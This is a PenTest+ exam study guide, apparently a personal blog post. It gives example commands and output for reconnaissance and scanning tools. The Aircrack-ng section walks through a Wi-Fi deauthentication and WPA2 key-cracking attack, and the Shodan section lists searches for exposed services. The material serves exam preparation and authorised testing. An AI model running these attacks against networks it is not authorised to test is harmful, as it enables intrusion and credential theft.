Tool up for the CompTIA PenTest+ PT0-003 exam
Nov 26, 2025
Passing the CompTIA PenTest+ (PT0-003) certification requires a solid understanding of over 70 offensive security tools. Understanding why these tools are used, specific tool syntax and typical output can help you prepare and go into the exam with confidence.
In preparing for the exam, the key study resources that stood out for me were:
- CompTIA PenTest+ Study Guide: Exam PT0-003 Book by Mike Chapple, David Seidl, and Robert Shimonski: This laid down the theory, objective by objective.
- TryHackMe PenTest+ path plus loads of other rooms to target specific tools and attacks.
- The Complete Pentest+ Course on Simply Cyber Academy. This is a fairly new release so picked it up late in my studies; Kudos to Daniel Lowrie for making this material so much fun to learn, thank you!
- Chris Greer udemy course: Nmap for Ethical Hackers - The Ultimate Hands-On Course. Knowing what happens "on the wire" during host enumeration was really useful for me.
- Getting hands-on with Kali Linux made the difference here. Knowing the tools and syntax inside-out was non-negotiable to get a solid pass.
So roll up your sleeves and tool up...I've got your back!
Tools broken down by domain
- Domain 2.0 Tools and Examples
- Domain 3.0 Tools and Examples
- Domain 4.0 Tools and Examples
- Metasploit
- Hydra
- sqlmap
- Burp Suite
- John the Ripper
- Responder
- Netcat (nc)
- Impacket
- CrackMapExec (CME)
- msfvenom
- hashcat
- medusa
- Mimikatz
- Rubeus
- Certify
- Seatbelt
- PsExec
- Evil‑WinRM
- LOLbins
- Zed Attack Proxy (ZAP)
- Postman
- Gobuster / DirBuster
- Wfuzz
- WPScan
- Pacu
- Docker Bench
- Prowler
- ScoutSuite
- WPAD
- WiFi‑Pumpkin
- Kismet
- Social Engineering Toolkit (SET)
- Gophish
- Evilginx
- Browser Exploitation Framework (BeEF)
- Scapy
- tcprelay
- MobSF (Mobile Security Framework)
- Frida
- Drozer
- Android Debug Bridge (ADB)
- Bluestrike
- Caldera (MITRE)
- Infection Monkey
- Atomic Red Team
- PowerView
- PowerUpSQL
- AD Search
- Other tools
✅ Domain 2.0 Tools and Examples
1. Nmap
-
Use Case: Network scanning and service enumeration.
-
Input Example:
nmap -sV -p 80,443 192.168.1.10 -
Output Example:
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 443/tcp open https OpenSSL 1.1.1| ICMP Code | Meaning | Typical Cause | Nmap Interpretation | |-----------|-------------------------------------------|-------------------------------------------------------|----------------------------------| | 0 | Network Unreachable | No route to the network | Host/network down or unreachable | | 1 | Host Unreachable | Host not responding, ARP failure, or interface down | Host down | | 2 | Protocol Unreachable | Protocol not supported at destination | Protocol not available | | 3 | Port Unreachable | No service bound to that port (common with UDP) | Port closed | | 9 | Network Administratively Prohibited | Firewall/ACL blocking network | Filtered | | 10 | Host Administratively Prohibited | Firewall/ACL blocking host | Filtered | | 13 | Communication Administratively Prohibited | Firewall/ACL blocking traffic by policy | Filtered | Closed → When it gets a clear ICMP Port Unreachable (Code 3). Filtered → When it gets an ICMP “Administratively Prohibited” (Codes 9, 10, 13) or no response at all. Open|Filtered → When it can’t tell if the port is open or filtered (e.g., UDP with no response). Down → When ICMP Host/Network Unreachable (Codes 0, 1) persist.
2. theHarvester
-
Use Case: Collect emails, subdomains, and hosts from public sources. Github
-
Input Example:
theHarvester -d kali.org -b duckduckgo -
Output Example:
[*] Target: kali.org [*] Searching Duckduckgo. [*] No IPs found. [*] No emails found. [*] Hosts found: 15 --------------------- arm.kali.org:35.185.44.232 autopkgtest.kali.org:104.18.5.159, 104.18.4.159 bugs.kali.org:104.18.4.159, 104.18.5.159 cdimage.kali.org:54.39.128.230 discord.kali.org:104.18.5.159, 104.18.4.159 docs.kali.org:104.18.5.159, 104.18.4.159 forums.kali.org:104.18.5.159, 104.18.4.159 http.kali.org:54.39.128.230 nethunter.kali.org:35.185.44.232 old.kali.org:54.39.49.227 pkg.kali.org:104.18.5.159, 104.18.4.159 status.kali.org:104.18.5.159, 104.18.4.159 www.kali.org:104.18.4.159, 104.18.5.159 www.kali.org:104.18.5.159, 104.18.4.159
3. WHOIS
-
Use Case: Query WHOIS records for domain registration information. WHOIS Protocol RFC
-
Input Example:
whois tryhackme.com -
Output Example:
Domain Name: TRYHACKME.COM Registry Domain ID: 2282723194_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2025-05-11T14:06:02Z Creation Date: 2018-07-05T19:46:15Z Registry Expiry Date: 2034-07-05T19:46:15Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: [email protected] Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: KIP.NS.CLOUDFLARE.COM Name Server: UMA.NS.CLOUDFLARE.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2025-11-05T16:27:48Z <<< [...] Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS [...] Admin Email: [email protected] [...] Tech Email: [email protected] [...]
4. nslookup / dig
-
Input Example:
nslookup -type=A tryhackme.com 1.1.1.1nslookup -type=MX tryhackme.comdig @1.1.1.1 tryhackme.com MXdig trih4ckme.com -
Output Example:
Server: 1.1.1.1 Address: 1.1.1.1#53 Non-authoritative answer: Name: tryhackme.com Address: 172.66.164.239 Name: tryhackme.com Address: 104.20.29.66Server: ::1 Address: ::1#53 Non-authoritative answer: tryhackme.com mail exchanger = 1 aspmx.l.google.com. tryhackme.com mail exchanger = 10 alt3.aspmx.l.google.com. tryhackme.com mail exchanger = 10 alt4.aspmx.l.google.com. tryhackme.com mail exchanger = 5 alt1.aspmx.l.google.com. tryhackme.com mail exchanger = 5 alt2.aspmx.l.google.com. Authoritative answers can be found from:; <<>> DiG 9.18.28-0ubuntu0.20.04.1-Ubuntu <<>> tryhackme.com MX ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13475 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1232 ;; QUESTION SECTION: ;tryhackme.com. IN MX ;; ANSWER SECTION: tryhackme.com. 300 IN MX 5 alt1.aspmx.l.google.com. tryhackme.com. 300 IN MX 5 alt2.aspmx.l.google.com. tryhackme.com. 300 IN MX 1 aspmx.l.google.com. tryhackme.com. 300 IN MX 10 alt3.aspmx.l.google.com. tryhackme.com. 300 IN MX 10 alt4.aspmx.l.google.com. ;; Query time: 4 msec ;; SERVER: ::1#53(::1) (UDP) ;; WHEN: Wed Nov 05 16:55:22 GMT 2025 ;; MSG SIZE rcvd: 157; <<>> DiG 9.18.28-0ubuntu0.20.04.1-Ubuntu <<>> trih4ckme.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 41241 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 [...]
5. Amass
-
Use Case: Comprehensive subdomain enumeration via multiple data sources & brute force. User Guide
-
Input Example:
amass intel -org "Tesla" -asn 394161 -cidr 199.120.0.0/16amass enum -d kali.org -brute -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txtSubcommands: amass intel - Discover targets for enumerations amass enum - Perform enumerations and network mapping amass viz - Visualize enumeration results amass track - Track differences between enumerations amass db - Manipulate the Amass graph database -
Output Example:
ASN: 394161 - AS394161 - Tesla Motors, Inc. 8.21.14.0/24 8.45.124.0/24 8.47.24.0/24 8.244.67.0/24 8.244.131.0/24 62.67.197.0/24 199.66.9.0/24 199.120.48.0/22 199.120.56.0/24 [...] 66.17.16.0/23 66.17.30.0/24 66.17.34.0/23 66.17.41.0/24mnemosyne.kali.org melpomene.kali.org dionysus.kali.org [...] helios.kali.org repo.kali.org mirror-status.kali.org purple.kali.org _dc-mx.6c2afe44a632.pkg.kali.org OWASP Amass v3.20.0 https://github.com/OWASP/Amass -------------------------------------------------------------------------------- 83 names discovered - scrape: 1, cert: 48, brute: 20, api: 14 -------------------------------------------------------------------------------- ASN: 63949 - LINODE-AP Linode, LLC 23.92.16.0/20 1 Subdomain Name(s) 2600:3c00::/30 7 Subdomain Name(s) 45.33.0.0/17 1 Subdomain Name(s) 45.56.64.0/18 1 Subdomain Name(s) 50.116.0.0/18 2 Subdomain Name(s) ASN: 13335 - CLOUDFLARENET - Cloudflare, Inc. 104.16.0.0/14 76 Subdomain Name(s) 2606:4700::/47 78 Subdomain Name(s) 8.6.112.0/24 3 Subdomain Name(s) 8.47.69.0/24 3 Subdomain Name(s) ASN: 16276 - OVH 176.31.0.0/16 2 Subdomain Name(s) 54.36.0.0/14 8 Subdomain Name(s) 15.235.0.0/16 2 Subdomain Name(s) 51.161.0.0/16 2 Subdomain Name(s) 51.222.0.0/16 3 Subdomain Name(s) 51.79.0.0/16 1 Subdomain Name(s) 66.70.128.0/17 2 Subdomain Name(s) 2001:41d0::/33 3 Subdomain Name(s) 192.99.0.0/16 1 Subdomain Name(s) 144.217.0.0/16 4 Subdomain Name(s) 51.91.0.0/16 1 Subdomain Name(s) 158.69.0.0/16 1 Subdomain Name(s) 2607:5300::/32 24 Subdomain Name(s) ASN: 3701 - NERONET - Network for Education and Research in Oregon (NERO) 140.211.0.0/20 6 Subdomain Name(s) The enumeration has finished Discoveries are being migrated into the local database
6. Shodan
-
Use Case: Internet-facing device search. List for search filters
-
Input Example: (Web UI or API or CLI)
shodan init [REDACTED_API_KEY]shodan host 8.8.8.8shodan scan submit 45.33.32.156curl -sG --data-urlencode "key=[REDACTED_API_KEY]" --data-urlencode 'query=has_vuln:true' "https://api.shodan.io/shodan/host/search" | jq '.matches[] | {ip_str, port, transport, org, data}'Top 10 queries: # 1. Find exposed SSH servers shodan search "port:22" # 2. FTP servers with anonymous login shodan search 'port:21 "Anonymous login allowed"' # 3. Public Telnet services shodan search "port:23" # 4. Web servers exposing directory listings shodan search 'port:80 title:"Index of /"' # 5. HTTPS servers by certificate common name shodan search 'port:443 ssl.cert.subject.cn:"example.com"' # 6. Apache servers running a specific vulnerable version shodan search 'product:"Apache" version:"2.4.49"' # 7. Exposed MySQL databases shodan search 'port:3306 product:"MySQL"' # 8. Open ElasticSearch instances shodan search 'port:9200 product:"ElasticSearch"' # 9. Public Redis servers shodan search 'port:6379 product:"Redis"' # 10. OpenVPN servers in a specific subnet shodan search "net:203.0.113.0/24 port:1194" -
Output Example: Images
8.8.8.8 Hostnames: dns.google City: Mountain View Country: United States Organization: Google LLC Updated: 2025-11-06T10:58:56.804650 Number of open ports: 2 Ports: 53/tcp 53/udp 443/tcp |-- HTTP title: Google Public DNS |-- Cert Issuer: C=US, CN=WR2, O=Google Trust Services |-- Cert Subject: CN=dns.google |-- SSL Versions: -SSLv2, -SSLv3, -TLSv1, -TLSv1.1, TLSv1.2, TLSv1.3Starting Shodan scan at 2025-11-06 15:03 - 100 scan credits left No open ports found or the host has been recently crawled and cant get scanned again so soon.
7. Wireshark / tcpdump
-
Use Case: Packet capture and analysis.
-
Input Example:
tcpdump -i eth0 port 80 -
Output Example:
10:15:23 IP 192.168.1.5 > 192.168.1.10: HTTP GET /index.html
8. Aircrack-ng
-
Use Case: Wireless network key cracking. Github
-
Input Example: Refer De-auth attack walkthrough
sudo airmon-ng start wlan0sudo airodump-ng --bssid 70:3A:51:0B:72:3C wlan0monsudo airodump-ng --bssid 70:3A:51:0B:72:3C -c 44 --write WirelessHackingTHMDay2_2 wlan0monsudo aireplay-ng --deauth 1 -a 70:3A:51:0B:72:3C -c 4E:78:4A:1A:47:52 wlan0monsudo aircrack-ng -w passwords.txt -b 70:3A:51:0B:72:3C WirelessHackingTHMDay2_2-01.cap|---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------| | Encryption | Weakness | Attack | Goal | Tools | |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------| | WEP (RC4) | Weak Initialization Vector (IV) reuse | - ChopChop (decrypt packets) | Recover WEP key | Aircrack-ng suite, Kismet | | | | - ARP Replay (inject traffic) | | | | | | - IV Attack (weak IVs) | | | |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------| | WPA (PSK) – RC4/TKIP | TKIP design flaws; offline cracking of PSK | Deauth → capture handshake → crack | Recover WPA PSK | Aircrack-ng, hcxdumptool, Hashcat | |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------| | WPA2 (PSK) – AES CCMP | Protocol flaw KRACK (key reinstallation); | Handshake capture + cracking; | Exploit 4-way handshake | Aircrack-ng, bettercap, Hashcat, | | | PSK can be cracked offline if weak | KRACK to decrypt/manipulate traffic | to decrypt traffic | KRACK scripts | |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------| | WPA/WPA2 Enterprise | Misconfig (e.g. no cert validation); | Evil Twin + captive portal credential | Steal credentials | hostapd-wpe, eaphammer, fluxion, | | (802.1X/EAP) | Rogue AP (Evil Twin) | phishing; EAP downgrade | | wifiphisher | |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------| | WPA3 – SAE (Dragonfly) | More resistant to offline dictionary | Transition mode/downgrade; implemetation | | eaphammer (transition attacks) | | with Perfect Forward | attacks; watch for downgrade to WPA2 | bugs | | | | Secrecy | | | | | |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------| | WPS | 8-digit PIN split (4+3) drastically | Online PIN brute force; Pixie-dust (weak | | Reaver, bully, pixiewps | | | reduces keyspace | PRNG) | | | |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------| -
Output Example:
CH 10 ][ Elapsed: 6 s ][ 2025-11-14 11:01 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 70:3A:51:0B:72:3C -42 7 0 0 44 433 WPA2 CCMP PSK THM-Net BSSID STATION PWR Rate Lost Frames Notes Probes 70:3A:51:0B:72:3C 4E:78:4A:1A:47:52 -43 0 - 6 0 111:01:33 Created capture file "WirelessHackingTHMDay2_2-01.cap". CH 44 ][ Elapsed: 9 mins ][ 2025-11-14 11:11 ][ fixed channel wlan0mon: 157 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 70:3A:51:0B:72:3C -47 96 3786 274 0 44 433 WPA2 CCMP PSK THM-Net BSSID STATION PWR Rate Lost Frames Notes Probes 70:3A:51:0B:72:3C 4E:78:4A:1A:47:52 -39 6e- 6 0 704 EAPOL11:09:00 Waiting for beacon frame (BSSID: 70:3A:51:0B:72:3C) on channel 44 11:09:00 Sending 64 directed DeAuth (code 7). STMAC: [4E:78:4A:1A:47:52] [11|116 ACKs]Reading packets, please wait... Opening WirelessHackingTHMDay2_2-01.cap Read 5748 packets. 1 potential targets Aircrack-ng 1.7 [00:02:01] 9936/10001 keys tested (83.46 k/s) Time left: 0 seconds 99.35% KEY FOUND! [ rocketman ] Master key : D0 4F 3C [...] Transient Key : F8 F8 F8 [...] EAPOL HMAC : DF 58 4E [...]
9. Maltego
-
Use Case: (GUI-based) Visual OSINT and relationship mapping.
-
Input Example: (GUI-based, select “Domain to IP” transform)
-
Output Example: Graph showing domain → IP → related entities.
10. SpiderFoot
-
Use Case: Automated OSINT scanning. Github
-
Input Example: (Web UI or CLI)
# Load the Web UI spiderfoot -l 127.0.0.1:5001# Scan with specific modules spiderfoot -s kali.org -m sfp_dnsresolve,sfp_ipinfo,sfp_bgpview -o tab -
Output Example:
2025-11-09 17:09:55,960 [INFO] sflib : Scan [B491122F] for 'kali.org' initiated. 2025-11-09 17:09:56,039 [INFO] sfp_dnsresolve : Identifying aliases for specified target(s) 2025-11-09 17:09:56,044 [INFO] sfp_dnsresolve : Target aliases identified: [{'type': 'IPV6_ADDRESS', 'value': '2606:4700::6812:59f'}, {'type': 'INTERNET_NAME', 'value': 'kali.org'}, {'type': 'IPV6_ADDRESS', 'value': '2606:4700::6812:49f'}, {'type': 'IP_ADDRESS', 'value': '104.18.5.159'}, {'type': 'IP_ADDRESS', 'value': '104.18.4.159'}] 2025-11-09 17:09:56,044 [INFO] sflib : sfp_dnsresolve module loaded. 2025-11-09 17:09:56,129 [INFO] sflib : sfp_ipinfo module loaded. 2025-11-09 17:09:56,363 [INFO] sflib : sfp_bgpview module loaded. 2025-11-09 17:09:56,529 [INFO] sflib : sfp__stor_db module loaded. 2025-11-09 17:09:56,608 [INFO] sflib : sfp__stor_stdout module loaded. SpiderFoot UI Internet Name kali.org SpiderFoot UI Domain Name kali.org sfp_dnsresolve IPv6 Address 2606:4700::6812:59f 2025-11-09 17:09:57,881 [INFO] sflib : Fetching (GET): https://api.bgpview.io/ip/2606:4700::6812:59f (proxy=None, user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0, timeout=5, cookies=None) 2025-11-09 17:09:57,884 [ERROR] sfp_ipinfo : You enabled sfp_ipinfo but did not set an API key! sfp_dnsresolve Domain Name kali.org sfp_dnsresolve IPv6 Address 2606:4700::6812:49f sfp_dnsresolve IP Address 104.18.5.159 sfp_dnsresolve IP Address 104.18.4.159 [...] 2025-11-09 17:10:07,238 [INFO] sf : Scan completed with status FINISHED
11. Wayback Machine
-
Use Case: Review historic snapshots to discover old paths, exposed secrets, removed endpoints.
-
Input Example:
(Web interface or API)https://web.archive.org/web/*/example.com/* -
Output Example:
Available snapshots: - 2018-05-12 14:22:31 https://example.com/index.html - 2020-09-30 09:01:07 https://example.com/home.html - 2022-03-11 20:55:12 https://example.com/js/app.min.js
12. Censys.io
-
Use Case: Internet-wide search of hosts/certs to find exposed services by technology/fingerprint. Generate reports and automate collection updates.
-
Input Example: (Web UI or API or python SDK)
# Web UI host.services.endpoints.http.headers: (key: "Server" and value: "Apache") and host.location.country: "United Kingdom"# Web UI # Requires a paid-for account tier host.services.vulns.id: *# API curl --request GET --url https://api.platform.censys.io/v3/global/asset/host/45.33.32.156 --header 'accept: application/vnd.censys.api.v3.host.v1+json' --header 'authorization: Bearer [REDACTED]' > censys-scanme.json# SDK import requests url = "https://api.platform.censys.io/v3/global/asset/host/host_id" headers = { "accept": "application/vnd.censys.api.v3.host.v1+json", "authorization": "Bearer [REDACTED]" } response = requests.get(url, headers=headers) print(response.text) -
Output Example: Full JSON results for scanme.nmap.org | Web UI Images
[...] "html_tags": [ "\u003ctitle\u003eGo ahead and ScanMe!\u003c/title\u003e", "\u003cmeta name=\"viewport\" content=\"width=device-width,initial-scale=1\"\u003e", "\u003cmeta name=\"theme-color\" content=\"#2A0D45\"\u003e", "\u003cMETA NAME=\"ROBOTS\" CONTENT=\"NOARCHIVE\"\u003e" ], "body_size": 6974, "body": "\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n\u003ctitle\u003eGo ahead and ScanMe!\u003c/title\u003e\n\u003cmeta name=\"viewport\" [...], "favicons": [ { "size": 529, "name": "http://45.33.32.156/shared/images/tiny-eyeicon.png", "hash_sha256": "f22e309dc81ff661756822b865f2a272a00e54af69a314392b0f16b0cb54df15", "hash_md5": "156515da3c0f7dc6b2493bd5ce43f795", "hash_shodan": 536238901 } ], "html_title": "Go ahead and ScanMe!", "body_hash_sha256": "7c6ac262c9cd17bfc9518d4140199e6ae954d1d7422bad53a378ce2868352fe5", "body_hash_sha1": "d5bdccd11872e84c7dc05a8c16d0ed2105eeb100", "supported_versions": [ "HTTP/1.1" ] [...]
13. Hunter.io
-
Use Case: Enumerate emails and patterns for a target domain (useful for credential formats & phishing simulations).
-
Input Example:
hunter.io search --domain example.com -
Output Example:
{ "domain": "example.com", "pattern": "{first}.{last}@example.com", "emails": [ {"value":"[email protected]","source":"LinkedIn"}, {"value":"[email protected]","source":"Company blog"} ] }
14. DNSdumpster
-
Use Case: Passive DNS mapping & subdomain discovery with basic host records and visual map. Site / API
-
Input Example:
(Web UI or API)curl -H "X-API-Key: [REDACTED]" https://api.dnsdumpster.com/domain/kali.org -
Output Example: Images
{ "a": [ { "host": "10year.kali.org", "ips": [ { "asn": "13335", "asn_name": "CLOUDFLARENET", "asn_range": "104.18.0.0/20", "banners": { "http": { "apps": [ "Cloudflare" ], "server": "cloudflare", "title": "Direct IP access not allowed " }, "http8080": { "apps": [ "Cloudflare" ], "server": "cloudflare", "title": "Direct IP access not allowed " }, "ip": "104.18.5.159" }, "country": "unknown", "country_code": "??", "ip": "104.18.5.159", "ptr": "" } ] }, { "host": "aeacus.kali.org", "ips": [ { "asn": "16276", "asn_name": "OVH, FR", "asn_range": "51.222.0.0/16", "banners": { "ip": "51.222.80.5", "ssh": { "banner": "SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u6" } }, "country": "Canada", "country_code": "CA", "ip": "51.222.80.5", "ptr": "ns576245.ip-51-222-80.net" } ] }, [...] ], "total_a_recs": 63, "txt": [ "\"google-site-verification=QO0m_WIzc81XaujadDfsFymI53IwsX4sCt-Tin9ugoI\"", "\"mjb3j7d41a5qd3i4qo8j8d9q7g\"", "\"v=spf1 a ip4:208.88.127.98 ip4:52.44.83.41 include:_spf.google.com include:sendgrid.net ~all\"", "\"MS=2F24AAB1EA3933DA8A05BF4B28C70033E0001820\"" ] }
15. Nmap Scripting Engine (NSE)
-
Use Case: Deeper enumeration & vuln checks (SMB, SSL/TLS, HTTP, etc.). Reference Portal
-
Input Example:
nmap -sV --script "vuln and safe" 192.168.1.10nmap -p80 --script http-apache-server-status 10.10.125.34Script categories: 1. auth: Scripts that deal with authentication (e.g., brute force, credential checks). 2. broadcast: Scripts that discover hosts by sending broadcast queries (e.g., DHCP, ARP). 3. brute: Perform brute-force attacks against services (e.g., SSH, FTP). 4. default: Scripts run when you use -sC or --script=default. Safe, general info gathering. 5. discovery: Host and service discovery beyond basic port scanning (e.g., SNMP enumeration). 6. dos: Denial-of-service checks (⚠️ intrusive). 7. exploit: Attempt to exploit vulnerabilities (⚠️ very intrusive). 8. external: Scripts that query external resources (e.g., WHOIS, GeoIP). 9. fuzzer: Send unexpected input to services to find bugs (⚠️ intrusive). 10. intrusive: Scripts that might crash or alter services (⚠️ use only with permission). 11. malware: Detect malware infections or backdoors. 12. safe: Scripts considered non-intrusive and unlikely to harm the target. 13. version: Service version detection enhancements. 14. vuln: Check for known vulnerabilities or insecure configurations. -
Output Example:
PORT STATE SERVICE VERSION 445/tcp open microsoft-ds | smb-vuln-ms17-010: | VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 | State: VULNERABLE |_ References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144PORT STATE SERVICE 80/tcp open http | http-apache-server-status: | Heading: Apache Server Status for example.com (via 127.0.1.1) | Server Version: Apache/2.4.12 (Ubuntu) | Server Built: Jul 24 2015 15:59:00 | Server Uptime: 53 minutes 31 seconds | Server Load: 0.00 0.01 0.05 | VHosts: |_ www.example.com:80 GET /server-status HTTP/1.1
16. WiGLE.net
-
Use Case: Locate SSIDs/BSSIDs and rough geolocation from crowd‑sourced wardriving data.
-
Input Example:
(Web UI or API)Search SSID: "CorpWiFi" -
Output Example:
SSID: CorpWiFi BSSID: AA:BB:CC:DD:EE:FF Last seen: 2025-03-14 Approx. location: 51.746, -2.283 Channel: 6 Encryption: WPA2 Location: 51.5074 N, 0.1278 W Signal Strength: -65 dBm
17. InSSIDer
-
Use Case: (GUI-based) Local wireless survey (channels, signal strengths, RSSI, security) to scope wireless targets. Real-time client packet analytics available with paid-for license Site
-
Input Example:
(GUI-based tool)Scan local Wi-Fi networks -
Output Example: Images
[...] SSID: CorpWiFi BSSID: 9C:XX:YY:ZZ:.. Signal: -56 dBm Clients: 3 Ch: 114 [128] Width: 20 MHz Security: None | WPA Personal/Enterprise | WPA2 Personal/Enterprise Mode: b/g/n/ax Basic Rates: 1,2,5.5,11 Max. Rate: 243.8 Last Seen: Now [...]
18. OSINTframework.com
-
Use Case: Curated directory to quickly jump to the right OSINT tool per data type (people, domains, socials).
-
Input Example:
Navigate: Domain Name → DNS → Subdomains -
Output Example:
Links: - DNSDumpster - Amass - Sublist3r - CRT.sh
19. Recon-ng
-
Use Case: Modular OSINT framework with workspace, data model, API keys, and modules. Github
-
Input Example:
recon-ng [recon-ng] > workspaces create thmredteam [recon-ng][thmredteam] > db insert domains domain (TEXT): example.com notes (TEXT): [*] 1 rows affected. [recon-ng][thmredteam] > marketplace search domains- [recon-ng][thmredteam] > marketplace install brute_hosts [*] Module installed: recon/domains-hosts/brute_hosts [*] Reloading modules... [recon-ng][thmredteam] > modules load brute_hosts [recon-ng][thmredteam][brute_hosts] > runCTRL-C [recon-ng][thmredteam] > modules load recon/domains-hosts/hackertarget [recon-ng][thmredteam][hackertarget] > options set SOURCE kali.org SOURCE => kali.org [recon-ng][thmredteam][hackertarget] > runmarketplace search KEYWORD to search for available modules with keyword. - D = Dependencies - K = Key required marketplace info MODULE to provide information about the module in question. marketplace install MODULE to install the specified module into Recon-ng. marketplace remove MODULE to uninstall the specified module.Keys Some modules cannot be used without a key for the respective service API. K indicates that you need to provide the relevant service key to use the module in question. - keys list lists the keys - keys add KEY_NAME KEY_VALUE adds a key - keys remove KEY_NAME removes a key Once you have the set of modules installed, you can proceed to load and run them. - modules load MODULE loads an installed module - CTRL + C unloads the module. - info to review the loaded module’s info. - options list lists available options for the chosen module. - options set NAME VALUE - run to execute the loaded module. -
Output Example:
[recon-ng][thmredteam] > marketplace search domains- [*] Searching module index for 'domains-'... +---------------------------------------------------------------------------------------------+ | Path | Version | Status | Updated | D | K | +---------------------------------------------------------------------------------------------+ | recon/domains-companies/censys_companies | 2.1 | not installed | 2022-01-31 | * | * | | recon/domains-companies/pen | 1.1 | not installed | 2019-10-15 | | | | recon/domains-companies/whoxy_whois | 1.1 | not installed | 2020-06-24 | | * | | recon/domains-contacts/hunter_io | 1.3 | not installed | 2020-04-14 | | * | | recon/domains-contacts/metacrawler | 1.1 | not installed | 2019-06-24 | * | | | recon/domains-contacts/pen | 1.1 | not installed | 2019-10-15 | | | | recon/domains-contacts/pgp_search | 1.4 | not installed | 2019-10-16 | | | [...] | recon/domains-hosts/brute_hosts | 1.0 | not installed | 2019-06-24 | | | [...]----------- EXAMPLE.COM ----------- [*] No Wildcard DNS entry found. [*] 01.example.com => No record found. [*] 03.example.com => No record found. [*] 11.example.com => No record found. [...] [*] www.example.com => (CNAME) www.example.com-v4.edgesuite.net [*] ws5.example.com => No record found. [*] ws7.example.com => No record found. [*] ws9.example.com => No record found. [...] [*] www.example.com => (A) 23.216.154.163 [*] Country: None [*] Host: www.example.com [*] Ip_Address: 23.216.154.163 [*] Latitude: None [*] Longitude: None [*] Notes: None [*] Region: None [...] ------- SUMMARY ------- [*] 6 total (5 new) hosts found. [recon-ng][thmredteam][brute_hosts] >-------- KALI.ORG -------- [*] Country: None [*] Host: 10year.kali.org [*] Ip_Address: 104.18.4.159 [*] Latitude: None [*] Longitude: None [*] Notes: None [*] Region: None [*] -------------------------------------------------- [...] ------- SUMMARY ------- [*] 69 total (61 new) hosts found.
🧪 Tips (Exam‑useful)
- Validate Nmap results with NSE scripts for deeper info.
- WHOIS privacy may hide registrant details.
- Shodan often returns outdated banners—verify manually.
✅ Domain 3.0 Tools and Examples
1. Nikto
-
Use Case: Web vulnerability scanning. Github
-
Input Example:
nikto -h 10.10.28.201 -p 8080# Show any cookies received nikto -h 10.10.28.201 -p 8080 -Display 2nikto -h 10.10.28.201 -Plugin cgi# Scan with credentials nikto -h http://10.10.131.92:1234/manager/html -id bob:bubbles -
Output Example:
- Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 10.10.28.201 + Target Hostname: 10.10.28.201 + Target Port: 8080 + Start Time: 2025-11-09 11:32:39 (GMT0) --------------------------------------------------------------------------- + Server: Apache-Coyote/1.1 + Retrieved x-powered-by header: Servlet/3.0; JBossAS-6 + Server leaks inodes via ETags, header found with file /, fields: 0xW/1554 0x1313480882000 + The anti-clickjacking X-Frame-Options header is not present. + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-39272: favicon.ico file identifies this server as: JBoss Server + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + Cookie JSESSIONID created without the httponly flag + 6544 items checked: 0 error(s) and 7 item(s) reported on remote host + End Time: 2025-11-09 11:32:48 (GMT0) (9 seconds) --------------------------------------------------------------------------- + 1 host(s) tested[...] + /admin-console/config.php sent cookie: JSESSIONID=BD85EA69D0C870800326239E08D80D92; Path=/admin-console + Cookie JSESSIONID created without the httponly flag + /jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer sent cookie: JSESSIONID=31F8DA9F45F7E89A965A6F4BB65A8BA7; Path=/jmx-console + 6544 items checked: 0 error(s) and 7 item(s) reported on remote host + End Time: 2025-11-09 11:25:44 (GMT0) (9 seconds) --------------------------------------------------------------------------- + 1 host(s) tested[...] + Server: Apache/2.4.7 (Ubuntu) + No CGI Directories found (use '-C all' to force check all possible dirs) + 6544 items checked: 0 error(s) and 0 item(s) reported on remote host + End Time: 2025-11-09 11:34:19 (GMT0) (1 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
2. OpenVAS
-
Use Case: Network vulnerability scanning.
-
Input Example:
omp -u admin -w pass --xml='<start_scan>' -
Output Example:
Scan report: CVE-2021-1234
3. Nessus
-
Use Case: Comprehensive vulnerability scanning.
-
Input Example:
nessuscli scan --target example.com -
Output Example:
